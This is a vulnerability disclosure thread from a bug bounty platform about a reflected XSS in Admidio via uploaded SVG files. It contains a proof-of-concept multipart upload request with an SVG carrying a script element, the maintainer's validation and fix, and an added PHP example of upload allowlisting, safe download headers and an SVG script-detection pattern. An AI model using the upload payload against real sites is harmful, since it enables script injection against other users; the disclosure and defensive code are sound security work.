Cross-site Scripting (XSS) - Reflected in admidio/admidio


Reported on

Oct 17th 2021


I am still able to reproduce the SVG XSS vulnerability here on my local system (I just downloaded the latest release from the website). I think you may have accidentally included SVG files in the whitelist.

Proof of Concept

POST /admidio/adm_program/system/file_upload.php?module=documents_files&mode=upload_files&id=6 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------105596666835784551932184244642
Content-Length: 571
Connection: close
Cookie: ADMIDIO_INSTALLATION_SESSION_ID=ajhu2uaaoaha7fk8vpdv165kao; ADMIDIO_abc_db_adm_SESSION_ID=r1pltsf7bp9fodrffonheefdnd; 'ADMIDIO_abc_db_adm_cookieconsent_status=dismiss; OJSSID=4bbfi99a73d9r0f5jm94irg6ls; PHPSESSID=3l4k4gsg30qn5ed2al4un9l5j7

Content-Disposition: form-data; name="files[]"; filename="payload.svg"
Content-Type: image/svg+xml
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""><svg version="1.1" baseProfile="full" xmlns="">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">


This vulnerability allows reflected XSS via upload of malicious SVG files.

Note: Can be chained with CSRF to perform XSS without the need for upload privileges.

We have contacted a member of the admidio team and are waiting to hear back 2 months ago
haxatron submitted a patch fix 2 months ago


Patch fix here:
Fix should treat SVG as attachments instead of inline files, preventing the XSS issue.

2 months ago


My apologies, please ignore the patch fix as I don't think it's complete

2 months ago


don't think it's correct*

Markus Faßbender validated this vulnerability 2 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
2 months ago

I added the whitelist after I fixed the original post from you and then didn't check the whitelist against SVG :-( Now I removed SVG from the whitelist.
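The two fixes discussed in this thread (haxatron's "serve SVG as an attachment" and the maintainer's "drop SVG from the whitelist") both come down to never letting a browser render an uploaded SVG inline. The following is an added example, not Admidio's code and not taken from the patch referenced above; all function and constant names are hypothetical. It shows an upload allowlist that keeps SVG out of the inline-renderable set, the response headers to send when a stored file is returned, and a simple scan for script content in SVG files that were stored before a fix was applied.

```php
<?php
declare(strict_types=1);

// Added example (hypothetical names): an upload allowlist that never treats
// SVG as an inline-renderable image, plus safe download headers.

// Extensions a browser may render inline. SVG is deliberately absent: it is an
// XML document that can carry <script> elements and event handler attributes.
const INLINE_SAFE_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif', 'pdf', 'txt'];

// Extensions accepted for upload but only ever returned as a download.
// Dropping 'svg' from this list too is the stricter option the maintainer chose.
const ATTACHMENT_ONLY_EXTENSIONS = ['svg', 'html', 'htm', 'xml'];

function normalizedExtension(string $filename): string
{
    // Only the final extension counts: "payload.png.svg" is an SVG.
    return strtolower(pathinfo($filename, PATHINFO_EXTENSION));
}

function isUploadAllowed(string $filename): bool
{
    $ext = normalizedExtension($filename);
    return in_array($ext, INLINE_SAFE_EXTENSIONS, true)
        || in_array($ext, ATTACHMENT_ONLY_EXTENSIONS, true);
}

// Headers to send when a stored upload is served back to a user.
function downloadHeaders(string $filename, string $storedMimeType): array
{
    $ext = normalizedExtension($filename);
    $inline = in_array($ext, INLINE_SAFE_EXTENSIONS, true);
    // Strip characters that could break or inject into the header value.
    $safeName = str_replace(['"', "\r", "\n"], '', basename($filename));
    return [
        // Non-inline types get a generic MIME type so nothing is rendered.
        'Content-Type'            => $inline ? $storedMimeType : 'application/octet-stream',
        'Content-Disposition'     => ($inline ? 'inline' : 'attachment')
                                     . '; filename="' . $safeName . '"',
        // Stop browsers from sniffing the body back into a renderable type.
        'X-Content-Type-Options'  => 'nosniff',
        // Belt and braces: even if rendered, no script may run in this document.
        'Content-Security-Policy' => "default-src 'none'; sandbox",
    ];
}

// Defender-side check for files already on disk: flag SVG bodies that carry
// script elements, on* event handlers or javascript: URLs.
function svgLooksActive(string $svgBytes): bool
{
    return (bool) preg_match('/<script\b|\son[a-z]+\s*=|javascript:/i', $svgBytes);
}

// Constructed sample input with the same shape as the report's payload.svg.
$sample = '<svg><polygon points="0,0 0,50 50,0"/><script>alert(1)</script></svg>';

foreach (['photo.png', 'payload.svg', 'payload.png.svg', 'run.exe'] as $name) {
    $allowed = isUploadAllowed($name);
    $disposition = $allowed
        ? explode(';', downloadHeaders($name, 'image/svg+xml')['Content-Disposition'])[0]
        : '-';
    printf("%-16s allowed=%-3s disposition=%s\n", $name, $allowed ? 'yes' : 'no', $disposition);
}
printf("sample svg carries active content: %s\n", svgLooksActive($sample) ? 'yes' : 'no');
```

Running this prints that `photo.png` is allowed and served inline, both SVG names are allowed but only as attachments, `run.exe` is rejected, and the constructed sample is flagged as active. The scan in `svgLooksActive` is a coarse triage aid for finding already-uploaded files worth reviewing, not a sanitizer; the headers and the allowlist are what actually prevent the XSS.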

Markus Faßbender confirmed that a fix has been merged on 4f1539 2 months ago
Markus Faßbender has been awarded the fix bounty